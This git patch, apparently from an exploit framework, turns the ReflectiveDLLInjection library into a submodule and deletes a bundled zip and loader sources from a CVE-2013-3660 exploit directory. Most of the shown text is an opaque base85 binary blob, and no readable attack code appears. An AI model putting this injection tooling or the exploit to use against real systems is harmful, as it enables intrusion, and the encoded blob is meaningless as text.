From 81c78efaea465e3420d60e713f0466e8ae00e157 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Thu, 5 Sep 2013 22:00:04 +0100 Subject: [PATCH 001/205] Example submodule --- .gitmodules | 3 + external/source/ReflectiveDLLInjection | 1 + .../source/ReflectiveDllInjection_v1.0.zip | Bin 167590 -> 0 bytes .../source/exploits/cve-2013-3660/.gitignore | 152 ++++++ .../source/exploits/cve-2013-3660/LICENSE.txt | 25 - .../cve-2013-3660/dll/reflective_dll.vcxproj | 24 +- .../dll/src/ReflectiveDLLInjection.h | 51 -- .../cve-2013-3660/dll/src/ReflectiveLoader.c | 496 ------------------ .../cve-2013-3660/dll/src/ReflectiveLoader.h | 202 ------- 9 files changed, 170 insertions(+), 784 deletions(-) create mode 100644 .gitmodules create mode 160000 external/source/ReflectiveDLLInjection delete mode 100644 external/source/ReflectiveDllInjection_v1.0.zip create mode 100644 external/source/exploits/cve-2013-3660/.gitignore delete mode 100755 external/source/exploits/cve-2013-3660/LICENSE.txt delete mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h delete mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c delete mode 100755 external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000000..0137af2ab8 --- /dev/null +++ b/.gitmodules @@ -0,0 +1,3 @@ +[submodule "external/source/ReflectiveDLLInjection"] + path = external/source/ReflectiveDLLInjection + url = git://github.com/stephenfewer/ReflectiveDLLInjection.git diff --git a/external/source/ReflectiveDLLInjection b/external/source/ReflectiveDLLInjection new file mode 160000 index 0000000000..178ba2a6a9 --- /dev/null +++ b/external/source/ReflectiveDLLInjection @@ -0,0 +1 @@ +Subproject commit 178ba2a6a9feee0a9d9757dcaa65168ced588c12 diff --git a/external/source/ReflectiveDllInjection_v1.0.zip b/external/source/ReflectiveDllInjection_v1.0.zip deleted file mode 100644 index 883acde770b84770e728396f7fb96a2318b8f19b..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 167590 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 